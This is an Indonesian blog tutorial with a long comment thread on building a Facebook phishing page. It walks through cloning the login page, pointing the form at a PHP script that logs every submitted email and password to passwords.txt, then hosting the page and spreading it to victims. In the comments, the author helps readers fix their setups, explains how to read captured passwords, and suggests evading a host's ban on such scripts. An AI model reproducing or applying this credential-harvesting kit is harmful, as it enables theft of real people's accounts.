Home ยป Facebook ยป Cara Membuat Web Phising

Cara Membuat Web Phising

Cara membuat Web Phising Facebook – Pada postingan kali ini saya akan membahas tentang cara membuat web phising. walaupun ini sudah berita lama yang banyak orang sudah mengetahuinya. Tapi saya yakin masih banyak yang ingin tahu tentang cara membuat web phising seperti yang anda baca sekarang ini. Apakah anda sudah tau apa itu web phising ?? Web Phisng = WEB+ Phising.
Web menurut saya adalah sebuah page/halaman yang berisi content yang di isi oleh admin/pemilik web, lebih lengkapnya kesini. Phising menurut dari yang saya baca yaitu berasal dari kata “Fishing” atau di bahasa Indonesia kan yang memiliki arti “memancing”. Lho kok Memancing? ternyata memang benar kita membuat web untuk memancing korban untuk masuk dalam perangkap Web Phising yang telah kita buat. Cara buatnya gimana ? Baik saya akan kasih tahu cara membuat web phising. Langkah – langkahnya sebagai berikut :

  1. Cari dan buka alamat yang mau dijadikan homepage/halaman utama Web Phising anda. misal http://www.facebook.com.
  2. Setelah halaman terbuka sepenuhnya anda tekal tombol “Ctrl + U” di keyboard secara bersamaan. Kemudian akan muncul Source Code.
  3. Copy semua Source Code?tersebut. Tekan “Ctrl + A(untuk blok semua source code) kemudian tekan “Crtl + C(untuk meng-copy / menyaslin Source Code tersebut).
  4. Setelah itu buka notepad/wordpad (Start – all program – accessories- Notepad/Wordpad) ?di WINDOWS?atau gedit (Applications – ?Accessories – Gedit Text Editor) di LINUX.
  5. Paste Source Code?(ctrl + v) yang sudah di copy tadi. seperti langkah nomor 3.
  6. Cari menggunakan “Crtl + F”, isi dengan “action=(tanpa tanda petik)
  7. Ketemu
    <form action="fb.com" method="post">
  8. Ganti fb.com” (contoh) dengan “phising.php”.
  9. Ubah “postmenjadi “GET“.
  10. Save as (file – Save as) atau tekan “Ctrl + S”. Berinama dengan “index.html” dan File Type pilih “All FIle”
  11. .Buka notepad lagi (langkah sama seperti nomor 4).
  12. Copy Paste Code PHP ini ke notepad :
    <?php header ('Location: http://fb.com ');
    $handle = fopen(passwords.txt, a);
    foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, =);
    fwrite($handle, $value);
    fwrite($handle, rn);
    }
    fwrite($handle, rn);
    fclose($handle);
    exit;
    ?>
  13. Ganti “http://fb.com” dengan “http://facebook.com” misal (tanpa tanda kutip).
  14. Save dengan nama phising dan extensi .php jadinya phising.php (Caranya sama seperti langkah no. 10)
  15. Upload ke hosting anda. (Silahkan cari hosting gratis atau berbayar, tidak disarankan menggunakan Hosting Gratis 000webhost untuk membuat web phising. Namun jika ingin tahu Cara Upload File di Free Hosting 000webhost silahkan baca saja. Satu lagi, pastikan domain anda sudah mengarah ke hosting anda. Jika anda tidak mengerti silahkan pelajari tentang Domain dan Hosting terlebih dahulu.
  16. Setelah ke-3 file berhasil di upload jangan lupa permission/chmod di atur 777 untuk file passwords.txt, agar password yang di ketikan oleh korban dapat tersimpan.
  17. Selesai. Silahkan Coba akes Domain anda dan apa yang anda lihat? Jika tampilan mirip seperti halaman ketika anda membuka website yang anda tiru berarti benar.
  18. Silahkan anda test apakah WebPhising buatan anda sukses dapat menyimpan email dan password korban.
  19. Jika berhasil menyimpan informasi login korban seperti email dan password, waktunya sebarkan web phising anda dengan kecerdikan anda.

Sekian dulu postingan cara membuat web phising apabila anda masih bingung jangan malu bertanya. ๐Ÿ˜€

222 Comments

  1. sertipikat tanah

    September 7, 2010 at 6:04 pm28

    bagus postinganya cobaah..
    fungsi dari pishing apa y ?

    Reply
  2. admin

    September 7, 2010 at 7:03 pm28

    fungsi phising yaitu untuk memancing korban masuk dalam website bo’ongan buatan kamu. :hihi:
    Itukan tujuan membuat web phising. :bom:

    Reply
    • andre

      September 8, 2010 at 7:10 am28

      makasi mas, keren nih infonya
      tujuannya bukannya buat ngambil pasword ama username ya? misal kalo di atas. nanti kita isa dapet password ama username FB.
      CMIIW

      Reply
      • admin

        September 8, 2010 at 8:33 am28

        Itu terserah anda. Kalo korban sudah masuk ke web phising buatan anda tinggal apa yang tersedia di web phising anda. Jika di web phising tersebut meminta untuk memasukan user password, seperti membuat web phising facebook misalnya. :ngelamun:

        Reply
        • andre

          September 8, 2010 at 10:51 am29

          link udah tak ganti bro :sliwer2:

          Reply
          • admin

            September 8, 2010 at 11:07 am29

            Thanks BRo. . . :hehe:

          • Rafli Diansyah Putra

            Desember 19, 2016 at 4:05 pm28

            mas kk punya saya eror yg file index html nya ..
            gimana solusinya ///

  3. Iqmal

    September 8, 2010 at 9:20 am28

    Wadew.. Maenannya serem :hore:
    Tuh kursornya ganggu, di disable ajah. hhe

    Reply
    • admin

      September 8, 2010 at 10:42 am29

      Saya masih nuwbiee gan :hehe:
      Ok gan sarannya saya terima. :sip:
      Ngomong2 themes yang di pake agan itu themes apa ya ?? hasil coding sendiri ?? :bisik:

      Reply
  4. aval

    September 12, 2010 at 1:08 am29

    pengertian di no.8 gmna bro ???
    beri penjelasan lg donk.

    Reply
  5. aval

    September 12, 2010 at 1:22 am29

    1. pengertian di no.8 dan 16 gmna bro ???
    2. gmna cara menjalan kn web phising ini
    mohon pencerahan nya ???

    Reply
    • Juz

      Mei 7, 2011 at 10:47 pm23

      Susah Nie… Cara Cari Actionnya DMN .?

      Reply
      • Amri

        Mei 12, 2011 at 2:34 pm23

        Action terserah agan aja.. ๐Ÿ˜€

        Reply
  6. Admin

    September 12, 2010 at 7:20 am29

    1. Untuk no.8 kita Lihat no.7. Disana kita menemukan script menuju “url web asli” yang artinya setelah kita login akan di arahkan ke web asli tersebut. Namun untuk cara membuat web phising kita harus mengubah url yang menuju ke web asli ke web buatan kita, web tersebut saya beri nama “phising.php”.
    Untuk no.16 kita harus merubah permission di file password.txt karena file tersebut harus read and write artinya bsa memembaca dan menulis, membaca untuk kita melihat password yang sudah tersimpan di “password.txt”,namun apabila chmod/permission tidak di ganti menjadi 777 maka password korban tidak akan tersimpan.
    2. Untuk menjalankan anda tinggal buka saja alamat web phsing anda. Kemudian untuk mendapat user/email dan password itu terserah anda.
    Ma’af saya sedang menggunakan hp butut untuk membalas koment anda jadi agak sulit. Apabila masih ada kesulitan silahkan berkomentar. ๐Ÿ™‚

    Reply
    • king

      Agustus 25, 2011 at 3:47 pm27

      berarti kita harus buat web phising lagi dong ?

      Reply
      • Amri

        Agustus 25, 2011 at 4:01 pm27

        Emang kenapa harus buat webphising lagi ? sudah jadi kah ?
        Kita tinggal perbaiki yang salah saja dimana. Tidak perlu membuat lagi…

        Reply
  7. Searscard

    September 22, 2010 at 3:22 am29

    Say thank you for have really fantastic informations. Your world-wide-web is greatI am impressed by the material that you have on this weblog. It exhibits how well you understand this topic. Bookmarked this method web page, will come back for far more. You, my buddy, awesome! I discovered just the specifics I already looked all over the place and just couldn?t discover. What a ideal website. Similar to this web site your web site is one of my new much-loved.I like this info shown and it has provided me some kind of idea to possess good results for some reason, so keep up the fantastic function!

    Reply
    • admin

      September 22, 2010 at 4:58 pm29

      not really, I’m still in a learning phase. you said touched my heart, thank you ๐Ÿ™‚

      Reply
  8. ayie

    September 23, 2010 at 12:55 pm30

    mas,klo web phising dalam message facebook itu gmna ?

    Reply
    • admin

      September 23, 2010 at 3:38 pm29

      Maksudnya gmn neh ?? Buat web phising terus promosikan web phising yang udh anda buat mungkin. Maklum masih newbiee ๐Ÿ˜€

      Reply
      • ayie

        September 23, 2010 at 7:32 pm29

        mksd saya gini,,
        ketika orang masukkan (cnth) username, paswot , itu larinya kemana biar kita bisa membuka nya (hack),web pising kita terhubung ke email or memang ada inbox spesial untuk username or paswot yg sudah diketikkan tsb,,
        mkmsii sblmnya.

        Reply
        • admin

          September 23, 2010 at 11:29 pm30

          coba cek lagi postingan saya diatas. Tepatnya No.12, teliti scriptnya yang saya beri bolt ( teks tebal ). Baris No. 3 ada tulisan “passwords.txt”. itu dia, password akan tersimpan di file password.txt.
          Kalau mau buka tinggal ketik di address browser kamu sbb :
          http://namadomain.tld/password.txt. Bagaiman ? kurang jelas ? tanyakan lagi. dengan senang hati saya menjawab ๐Ÿ™‚

          Reply
  9. ayie

    September 24, 2010 at 5:46 pm29

    oh,,
    iya,,iya,,,
    sya jg newbie ,jdinya harus banyak tanya biar agak mngrti,,
    nah,skrg gimana mengenai phising yg masuk k inbox facebook,dengan sediki kata-kat mereka menyuruh kita meng klik satu link yg klo dibuka itu berisi sebuah web phising, mksd saya mereka hebat membuat sebuah web, dapat dari mana ya mereka ??

    Reply
  10. ayie

    September 24, 2010 at 6:11 pm29

    wah,,,
    saya sudah coba step by step, saya tdk mngrti, dan susah untuk mnegerti,
    apa lgi step nmr 15,,terlebih semuanya
    mohon di bimbing,,
    apa anda ada email ??

    Reply
  11. admin

    September 24, 2010 at 6:19 pm29

    Kalu itu tergantu ke cerdasan kita untuk memancing korban dengan kata2 anda sendiri. Saya buat web phising ini hanya buat pembelajaran saja dan tidak untuk mencari korban. Jadi untuk tahap berikutnya bisa anda praktekan sendiri. Tapi ingat : RESIKO TANGGUNG PENUMPANG :))
    Mau coba ada neh di http://cekpulsa.co.tv << saya pisah dari blog saya karena takut resiko di suspend :))

    Reply
  12. ayie

    September 24, 2010 at 6:32 pm29

    cek pulsa itu streaming kan ?bagian mana nya yg merupakan phsing ??
    nah,skrg sy mnt pendapat anda,
    ada fb mainan saya yg inbox nya terdpat web phising,
    apa sama dgn tuts anda yg d atas,
    saya kasih disini id sama paswotnya or gmna ?

    Reply
    • admin

      September 24, 2010 at 6:50 pm29

      OK,, password apa ?? boleh.

      Reply
  13. ical

    Desember 23, 2010 at 3:31 am28

    MEMBUKA PERMISSION NY TU DR MANA GAN???
    TRUS,,FILE YG MANA LG HARUS KITA SIMPAN MENJADI ::PASSWORD.TXT::???
    WA MSH BINGUNG X NI MMBUAT NYA…..
    MAKLUUUMMM,,NEWBIE…..
    HEHEHEHE
    MOHON AJARAN NY Y GAN……

    Reply
  14. Amri

    Desember 23, 2010 at 6:55 pm28

    kita tinggal buat file lewat text document / notepad / wordprad. Terus tinggal di upload lewat file manager di cpanel. permision ada di file manager di cpanel.

    Reply
  15. ICAL

    Desember 25, 2010 at 3:37 am28

    ok dehh gan…
    thx a lot ya…..

    Reply
  16. jay

    Februari 16, 2011 at 5:00 pm28

    thanks artikelnya masbro..ijin di test he..he..:)

    Reply
    • Amri

      Februari 16, 2011 at 5:05 pm28

      Silahkan ๐Ÿ˜€

      Reply
  17. rizkqi

    April 24, 2011 at 6:59 am25

    Ganti URL WEB ASLI dengan phising.php ( phising.php hanya perumpamaan, bisa anda ganti namun harus semua dengan kata phising.php nantinya di ganti dengan nama.php anda ).
    Ubah ?post? menjadi ?GET?.
    itu ane gk ngerti

    Reply
    • Amri

      April 24, 2011 at 10:36 am26

      Kalo bingung ikutin saya aja, buat dengan nama “phising.php”.
      Nah diatas kan tertera <form action="URL WEB ASLI" method="post">. Agan ganti post dengan GET.

      Reply
  18. rizkqi

    April 24, 2011 at 7:19 am25

    Save dengan nama phising dan extensi .php jadinya phising.php
    Upload ke hostingan anda.
    Jangan lupa permission di atur 777 untuk file passwords.txt
    gan di savenya 2 kali ya yg pertama formatnya phising.txt terus yg keduax bebas misalnya qmail.php gitu ya, terus yg passwordnyadi ganti di mananya

    Reply
    • Amri

      April 24, 2011 at 10:37 am26

      Bukan, ekstensi yang .txt diganti .php. Kalau phising.php ya phising.php saja.

      Reply
  19. Travismark

    April 24, 2011 at 12:28 pm26

    Mas bro sya mau tnya sya sudah bsa bwt
    http://www.pdgki.org/login.php
    tp sya test memssukan email password dan klik login
    stelah sya buka http://www.pdgki.org/password.txt
    kok mlah tulisan itu…
    bgmna ajarin donk

    Reply
    • Amri

      April 24, 2011 at 1:17 pm25

      Tulisan itu apa ? Kok not found ?

      Reply
  20. CokPekTol

    Juni 4, 2011 at 2:32 am23

    Upload ke hosting caranya gimana yak ?

    Reply
    • Amri

      Juni 4, 2011 at 7:51 am23

      Masuk aja dulu ke control panel hosting agan… cari menu file manager… nah disitu nanti ada menu lagi untuk upload file agan.. ๐Ÿ™‚

      Reply
      • CokPekTol

        Juni 4, 2011 at 8:08 pm23

        kk ga ada menu file manager tuh ?
        Gimana donk -__-“

        Reply
        • Amri

          Juni 5, 2011 at 1:50 am23

          pake cpanel atau apa? hosting dimana ?

          Reply
  21. zulqarnain

    Juni 4, 2011 at 10:01 pm24

    dimana kita mengganti permission 777 ???
    engga ngerti ?????

    Reply
    • Amri

      Juni 5, 2011 at 1:50 am23

      di chmod file managernya. setelah masuk cpanel langsung pilih file manager…

      Reply
  22. aditya

    Juni 17, 2011 at 11:52 am25

    ga ad file managernya kk . . !!
    Gimana ??

    Reply
    • Amri

      Juni 17, 2011 at 6:06 pm24

      Kalo gak ada file manager ya menu lainnya pokonya yang bisa untuk masuk diretory html nya atau yang untuk upload file2…

      Reply
  23. aditya

    Juni 18, 2011 at 10:13 am25

    contoh nya ??

    Reply
  24. aditya

    Juni 18, 2011 at 10:52 am25

    aq dah sampe step 14 , yg 15&16 aq ga tau !!
    jelasin lg donk . . .

    Reply
    • Amri

      Juni 18, 2011 at 8:37 pm24

      Udah tau apa itu hosting ?
      Udah punya hosting ?
      Kalo belum punya silahkan daftar free hosting saja di google banyak. Lalu masuk cpanel dan cari file manager.

      Reply
  25. faroel

    Juni 19, 2011 at 11:42 am25

    broo.., aq dah buat smua file na nie..,
    file.html
    file.php
    file.txt
    trus dah gwe apload ke freewebhostingarea.com.., kemudian gmana cara na kta bka wab na itu broo, chmod na jga dah gwe ganti dgn 777 slanjut na gimna lgi nie broo.., mohn bimbingn na ya ๐Ÿ˜‰

    Reply
    • Amri

      Juni 19, 2011 at 1:26 pm24

      Tinggal akses saja nama domain yang kamu daftarkan di hosting itu… dah deh jadi.. ๐Ÿ˜€

      Reply
  26. MJ

    Juni 21, 2011 at 12:24 pm25

    mas bro, ada ym ga ??
    biar enak nanya2nya, hehehehehe .
    thx jika tdk keberatan ๐Ÿ˜‰

    Reply
    • Amri

      Juni 21, 2011 at 5:37 pm24

      Nanya apa bro ? Silahkan tanya aja disini. ๐Ÿ˜€
      Kalau mau ym ada di page/halaman about me.

      Reply
  27. aditya

    Juni 22, 2011 at 12:03 pm25

    aq ga tw,, hosting itu ap ??

    Reply
    • Amri

      Juni 22, 2011 at 5:50 pm24

      Hosting itu adalah tempat untuk menyimpan file yang kamu buat itu. Hosting bisa berbayar atau free… kamu bisa pilih sendiri….

      Reply
  28. aditya

    Juni 25, 2011 at 9:48 am24

    Hosting aq 4Shared ,, bisa ?
    Bestu data yg 3 tu di Upload ya ??

    Reply
    • Amri

      Juni 25, 2011 at 4:48 pm24

      Kalo 4shared itu file hosting mas,,, Bukan webhosting. Yang mas butuhkan itu webhosting karena mas akan membuat Web Phising. ๐Ÿ˜€

      Reply
  29. jibril

    Juli 5, 2011 at 9:37 am23

    gan gimana nih aku masih binggung kok pas di buat udah bisa tapi pas di test log in error?? mohon bantuan nya

    Reply
    • Amri

      Juli 6, 2011 at 4:02 pm23

      Errornya gimana ? Silahkan posting disini.

      Reply
  30. Hacker harajuku

    Juli 19, 2011 at 1:14 pm24

    gan saya gk ngerti.. smua nya sudah jadi..dan sudah di upload ke 000webhost.com
    tapi saya binggung URL saya yg mana yah..
    dan gimana gw bisa tau web url phising punya saya..
    (newbie gan)

    Reply
    • Amri

      Juli 19, 2011 at 4:57 pm24

      Nah itu domain/subdomain yang pertama kali anda masukan ketika mendaftar di 000webhost.

      Reply
  31. Loung Photos

    Juli 20, 2011 at 5:36 pm24

    old script but still working, nice share dude ๐Ÿ™‚

    Reply
    • Amri

      Juli 20, 2011 at 5:56 pm24

      Thanks You.

      Reply
  32. shurikenz

    Juli 21, 2011 at 12:29 am25

    trus cara bikin link biar bs d kirim k org gmn prenz…?
    mohon bantuannya, thankz…

    Reply
    • Amri

      Juli 21, 2011 at 1:37 am24

      Nah itu seh tergantu kreatifitas kamu aja. Ma’af saya tidak mengajarkan hack/merusak.
      Tutorial diatas cuma sebagai pengetahuan saja. ๐Ÿ˜€

      Reply
  33. Endi

    Agustus 8, 2011 at 4:32 pm26

    Caea uploadnya gimana?
    terus masukan permision code di mana?

    Reply
  34. rizzal

    Agustus 14, 2011 at 1:58 pm27

    no. 16 itu caranya gimana ya ?

    Reply
    • Amri

      Agustus 14, 2011 at 2:01 pm27

      Banyak komentar yang masih nyangkut di server lama gan sorry.
      – jawaban pertanyaan no. 16
      Setelah anda upload file – file yang sudah anda buat di hosting pasti anda akan menemukan option permission/chmod. Silahkan langsung anda praktikkan saja dan lihat di file manager.

      Reply
  35. ari

    Agustus 24, 2011 at 5:23 am27

    gimana caranya membuka almat web fhisingx?

    Reply
    • Amri

      Agustus 24, 2011 at 12:43 pm28

      Alamat web Phising ya alamat domain yang kamu buat….

      Reply
  36. angga

    Agustus 25, 2011 at 10:01 pm28

    yang jadi admin minta alamat fbnya dunk . . ane mau minta ilmunya dikit dan
    hehehe

    Reply
    • Amri

      Agustus 26, 2011 at 1:17 am27

      Cek aja di halaman “About Me” disana ada FB saya. Tapi saya bukan master. Saya juga lagi belajar.. ๐Ÿ˜€

      Reply
  37. rahmad

    September 7, 2011 at 3:08 pm28

    gan gak ngerti aq gan pas aq upload kata dia not fround kayak mana nih gan

    Reply
    • Amri

      September 7, 2011 at 6:30 pm28

      PAs di akses domainnya not found gitu ? yang jelas gan, sekalian kasih errornya atau SS-nya mungkin.

      Reply
  38. kristiana

    September 10, 2011 at 4:32 pm29

    maksud dri upload k’hosting itu gmna,,??
    .sory w baru belajar ,maklumin ya..??
    hhe….

    Reply
    • Amri

      September 10, 2011 at 5:26 pm29

      Sebaiknya kamu belajar domain dan hosting dulu.

      Reply
  39. dhanyong

    September 23, 2011 at 8:42 pm29

    bang masa pas sudah saya tulis (action=) kaga ada yang keluar,,,yang ada hanya tanda hijau di tulisa ACTION= nya,,,
    apa ada kesalahan ya???
    tolong jelasiin bang !!

    Reply
    • Amri

      September 23, 2011 at 11:38 pm30

      Tadi saya iseng nyari ketemu <form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)">
      Untuk bsa gaknya silahkan anda coba sendiri.

      Reply
  40. afit

    September 27, 2011 at 8:25 pm29

    mantap gan……api nyong gak bisa nih,………sulit sekali sih….ajarin gan……

    Reply
    • Amri

      September 27, 2011 at 10:07 pm30

      Itukan di atas sudah saya ajarin..

      Reply
  41. wincore

    September 28, 2011 at 12:19 pm30

    Gan tnya,,taruh kata kita dah buat web phising kaya yg agan ajarin lha setelah itu gmana? apa otomatis seluruh user+pass akun facebook (misalnya) lari ke web hostingan kita? trims

    Reply
    • Amri

      Oktober 7, 2011 at 9:41 pm26

      yang login lewatweb phising agan akan kesimpen semua.

      Reply
  42. rada

    Oktober 6, 2011 at 7:52 pm26

    maaf bng saya mau tanya ada gk cara gampang dan praktis untuk memboboL mail to facebook dengan mudah.. kLu da bisa di jelasin mail saya.. X) makasih..

    Reply
    • Amri

      Oktober 7, 2011 at 9:41 pm26

      Wah, saya gak tau tuh gan.. ๐Ÿ˜€

      Reply
  43. Yua

    Oktober 12, 2011 at 8:47 am27

    Mas.,maksudnya URL web asli dganti dgn phising.php tu gmna ?
    dan gmna cara bkin hlaman php ?

    Reply
    • Amri

      Oktober 12, 2011 at 3:21 pm27

      Dibaca dulu sampai selesai. Pada poin berikutnya sudah di jelaskan cara membuat phising.php
      Cara membuat ekstensi php tinggal rename aja yang tadi nya file .txt menjadi .php

      Reply
  44. Yuan

    Oktober 13, 2011 at 7:49 am27

    Maksud dari
    – Jangan lupa permission di atur 777 untuk file passwords.txt
    apa ?

    Reply
    • Amri

      Oktober 13, 2011 at 5:37 pm27

      Mengijinkan agar passwords.txt dapat di eksekusi, dibaca dan di tulis oleh semua pihak…
      Klao passwords.txt gak diubah ke chmod 777 email dan password tidak akan tersimpan karena tidak memiliki hak akses.

      Reply
  45. Ali

    Oktober 13, 2011 at 9:35 am27

    sya mau tnya..saat upload di 000webhost.com itu yg di upload ada brp file ?

    Reply
    • Amri

      Oktober 13, 2011 at 5:41 pm27

      Sebenernya 000webhost.com tidak mengijinkan script seperti ini dipasang di server mereka tp kalau mau coba – coba dan gak ketahuan ya gak papa itung2 coba2.
      ada 3 file :
      Index.html
      phising.php
      passwords.txt

      Reply
  46. MReyhanAbizar

    Oktober 19, 2011 at 4:39 pm27

    Thanks gan saya dah coba dan berhasil.
    pertama tama saya coba pakai punya saya dulu
    dan ada di password.txt

    Reply
    • Amri

      Oktober 19, 2011 at 5:47 pm27

      Nah, ini dia hacker-nya… ๐Ÿ˜€

      Reply
  47. MReyhanAbizar

    Oktober 19, 2011 at 4:44 pm27

    ribet gan uploadnya 000webhost

    Reply
    • Amri

      Oktober 19, 2011 at 5:50 pm27

      ya itu cuma contoh saja. Kalau anda punya hosting Cpanel itu lebih mudah…

      Reply
  48. andre

    Oktober 20, 2011 at 8:28 pm27

    no 3 maksudnya gmna…

    Reply
    • Amri

      Oktober 21, 2011 at 7:26 pm27

      Setelah melakukan langkah ke-2 pasti paham untuk langkah ke-3. Kalo belum paham silahkan belajar apa itu source code.

      Reply
  49. david

    Oktober 26, 2011 at 11:07 am28

    sebelumnya terima kasih atas share ilmunya..saya dah buat sesuai petunjuk diatas, sudah mencoba untuk masuk web phising yang saya buat dan coba asal login, tp di password.txt tetap kosong(sudah diganti 777) dimanakah letak kesalahannya?apakah cara ini sudah tidak mempan, tolong penjelasannya.trims

    Reply
    • Amri

      Oktober 26, 2011 at 2:45 pm27

      Kurang tau gan udah lama gak mainan phising…. Tapi baca deh komentar di atas ada salah satu yang berhasil. Nanti kalo ada waktu luang boleh deh saya coba lagi cara diatas…
      Yang penting

      jangan lupa.
      Reply
  50. SaputraMZ

    Oktober 29, 2011 at 4:40 pm27

    Berkunjung balik kawand, mas kalo phising kan untuk halaman tipuan, tau cara bikin redirect ga’ mas, bantuin dunk, jadi kalau web diakses akan mengarah ke web yg lain gitu…?

    Reply
    • Amri

      Oktober 29, 2011 at 7:40 pm27

      Buat redirect apa dulu ??Coba search aja di blog saya dengan kata kunci redirect.

      Reply
  51. Registery

    Oktober 30, 2011 at 8:15 pm27

    website jebakan betmen :hah:
    link udh nongol

    Reply
    • Amri

      Oktober 31, 2011 at 8:11 am27

      Link juga udah kepasang ๐Ÿ˜€

      Reply
  52. inot

    November 3, 2011 at 1:36 pm27

    kok aku coba cara sprti yang di atas gak bisa ya..? smp langkah ke tujuh..? pas masukin find text..? knp ya…?

    Reply
    • Amri

      Desember 4, 2011 at 9:33 am27

      Gak bisanya gimana ?? gak bisa atau gak ketemu ?? ingat tanpa tanda petik.

      Reply
  53. TRINO SWANTO.M

    Desember 3, 2011 at 9:55 pm27

    maaf aku kurang tau dengan statement yang diatas pa beloh diperjelas gak, aku sudah buka facebook dan menekan ctrl+u secara bersamaan tapi source code nya tidak ada?cara nya gimana ya tolong dikasih tau lagi ya?

    Reply
    • Amri

      Desember 4, 2011 at 9:32 am27

      Gak mungkin kalo suatu halaman gak ada source Code nya…

      Reply
  54. Petrus

    Desember 7, 2011 at 7:57 am27

    maaf a saya ingin bisa tapi tidak bisa melakukan langkah di atas, bukan kah kata si aa lebih baik bertanya dari pada sesat di jalan?kalau boleh kirim no HP si aa ke email saya,mungkin dengan cara mempraktekan lewat telfon saya bisa paham dan mengerti cara membuat web phishing tersebut. terimakasih sebelumnya……..

    Reply
    • Amri

      Desember 7, 2011 at 8:16 am27

      Gak bisanya dimana ?? SIlahkan bertanya2 disini saja…

      Reply
      • petrus

        Desember 7, 2011 at 3:35 pm27

        saya susah di pahami a lw tutorial nya lewat tulisan, mungkin lw tutorial lewat video/suara (telfon), mngkin sya bisa, sekalian jga kita lebih dekat dan menjalin tali persodaraan a.

        Reply
        • Amri

          Desember 7, 2011 at 4:08 pm27

          Add ym ku aja @amrikarisma

          Reply
  55. irwinsyah hamid

    Desember 8, 2011 at 7:48 pm27

    amri @ = gimana yah cara buat Cara Upload File di Free Hosting 000webhost.

    Reply
  56. petrus

    Desember 9, 2011 at 4:19 am27

    [email protected] a di PC q loem ada aplikasi YM nya,ngobrol mslh membuat web phishing nya di FB z atuh lw gk bsa di sini mah,saya udh add ko kmrin2 ke FB si aa,v loem di knfrmsi.

    Reply
  57. Ahmad

    Desember 11, 2011 at 5:22 am28

    cara lihat hasilnya dimana,??
    saya sudah selesai buat phisingnya

    Reply
    • Amri

      Desember 11, 2011 at 8:24 am28

      Buatnya dimana ?? Silahkan buka domain yg anda gunakan untuk membuat webphising tersebut.

      Reply
  58. umar

    Desember 13, 2011 at 12:04 am29

    cara menyelesaikan no 7 gimana caranya???
    apa maksud dari kata “ketemu”??

    Reply
    • Amri

      Desember 13, 2011 at 2:01 pm28

      Pada tahap no.6 yaitu mencari action=
      maka pada no.7 ditemukan.

      Reply
  59. baron

    Desember 15, 2011 at 6:37 pm28

    mas aq udh tahap upload….py udh aq upload..cara buat link ke php nya gmn..??

    Reply
    • Amri

      Desember 16, 2011 at 10:47 am29

      Di buka lewat domainnya mas. ๐Ÿ˜€

      Reply
  60. Jefferly

    Desember 21, 2011 at 8:31 pm28

    waw..
    mantap..
    saya coba dulu Gann.

    Reply
  61. djsamm88

    Desember 22, 2011 at 1:26 pm28

    cara lama bos, yg baru dah ada, hasilnya bisa masuk ke email, dan ga akan di susupend….
    kalo mau lihat, neh ane kasi link nya….
    http://a7xself.hpage.mobi/hacking__with_fake_login_51338944.html

    Reply
  62. tian

    Januari 7, 2012 at 8:56 am26

    untuk file password.txt nya kurang jelas gan,,
    yang di bilang diatas cuma 2,,
    untuk password.txtnya gan???

    Reply
    • Amri

      Januari 8, 2012 at 1:06 am26

      Cuma bikin file kosong dengan nama passwords.txt aja kok… dan permision set ke 777

      Reply
      • irwin

        Agustus 10, 2013 at 12:15 am28

        gan, maksudnya permission set ke 777 itu gimana?

        Reply
        • Amri

          Agustus 14, 2013 at 12:25 am28

          Itu di filenya di setting chmod nya ke 777 artinya supaya file tersebut bisa di tulis,dibaca dan dieksekusi oleh user,grup dan lainnya.

          Reply
  63. Zaelani

    Januari 11, 2012 at 2:48 pm27

    gan dah gw add YMnya tolong konfrim yah biar aku bisa sharing ma bapak .. ๐Ÿ˜€

    Reply
    • Amri

      Januari 11, 2012 at 3:28 pm27

      Jangan panggil bapak saya belum menikah.. ๐Ÿ˜ฏ
      oke gan TKP dulu… ๐Ÿ™‚

      Reply
  64. afif

    Januari 15, 2012 at 6:45 pm27

    boz…file.nya cuma dua.ya yg di upload..?? index.html ma phising.php..???

    Reply
    • Amri

      Januari 15, 2012 at 7:34 pm27

      Iya, terus nambah satu lagi bua file kosong dengan nama passwords.txt.
      kalo bingung buat sekalian di komputer terus tinggal upload, jadi 3 file kalo sama passwords.txt

      Reply
  65. afif

    Januari 15, 2012 at 6:52 pm27

    cara nyebarin wep phising gmn.>???

    Reply
  66. afif

    Januari 15, 2012 at 6:55 pm27

    boz…cara test webphising nya gmn..???
    ane kgak tau >????

    Reply
  67. agus

    Februari 2, 2012 at 11:32 am28

    ke 777 mksud.y ..gmna
    ???

    Reply
  68. Addzifi

    Februari 4, 2012 at 9:37 pm27

    yah..gan saya dah nyoba, but ada masalah pas upload file2 d atas kayaknya..biz dah selse smuanya

    Reply
  69. aguzt

    Februari 4, 2012 at 11:36 pm28

    ga cara bikin phising facebook mobile gimana..??
    ane udah coba yang facebook versi desktop sukses tapi yang buat mobile belum bisa..

    Reply
  70. lowongan kerja hhrma

    Februari 8, 2012 at 1:04 pm27

    wah… ide hebat. boleh pasang untuk jebak teman. hehehehe

    Reply
  71. andrazee

    Februari 15, 2012 at 6:38 am28

    belum working gan… mohon petuahnya,,, aku add ym nya gan.. ๐Ÿ˜€

    Reply
  72. ryan

    Februari 15, 2012 at 5:41 pm28

    file yg di upload ada berapa.? yang mana aja
    1. index.html
    2. phising.php
    3. ?

    Reply
    • Amri

      Februari 16, 2012 at 4:36 am28

      3.passwords.txt

      Reply
  73. ryan

    Februari 15, 2012 at 6:40 pm28

    kok hasilnya begini http://www.fbgue.com

    Reply
    • Fzcraft

      Januari 2, 2014 at 11:51 am27

      salah kau belom beli domain

      Reply
  74. orexas

    Mei 1, 2012 at 8:02 pm22

    tlong dong ajarin mas brow?

    Reply
  75. hendry heryana

    Mei 8, 2012 at 4:05 am22

    Mau ikut lewat,, jual script website murah ada yang mau?

    Reply
  76. odilo febrian

    Mei 9, 2012 at 9:56 am22

    di no. 16 tertulis “ke 3 file”
    tapi saya cuma menghasilkan 2 file ?

    Reply
    • Amri

      Mei 9, 2012 at 9:52 pm22

      Kurang passwords.txt

      Reply
  77. vindra88

    Mei 19, 2012 at 1:56 am23

    yang sudah pernah belajar basic html pasti paham dengan langkah2 di atas… ๐Ÿ™‚
    cuman sayang, saya masih belum begitu paham tentang upload ke web hosting.
    tutorialnya apakah ada, mas bro??

    Reply
  78. Thementor

    Juni 17, 2012 at 12:24 pm25

    udah selesai kk,
    phising buatan bocah smp..
    ;D

    Reply
  79. reza

    Juni 18, 2012 at 5:09 pm24

    gan aku bingung yang nomor 15

    Reply
  80. Fahri

    Juli 20, 2012 at 9:18 am24

    sya sudah slesai semua tpi kok pas buka hostingnya masih iklan blum hlaman kYa facebook.?

    Reply
    • Fzcraft

      Januari 2, 2014 at 11:55 am27

      B’rarti Ada yg salah

      Reply
  81. rahmat

    Juli 23, 2012 at 2:10 am24

    saya sudah selesai meng-upload ke hosting,tp kok setelah di buka linknya gk berhasil hanya ada bacaan index of/,,,,,letak kesalahannya di mana ya mas?apakah emng karna memakai hosting gratisan ya????tolong di ksh tau solusinya,,,,,

    Reply
    • Amri

      Juli 23, 2012 at 11:10 am25

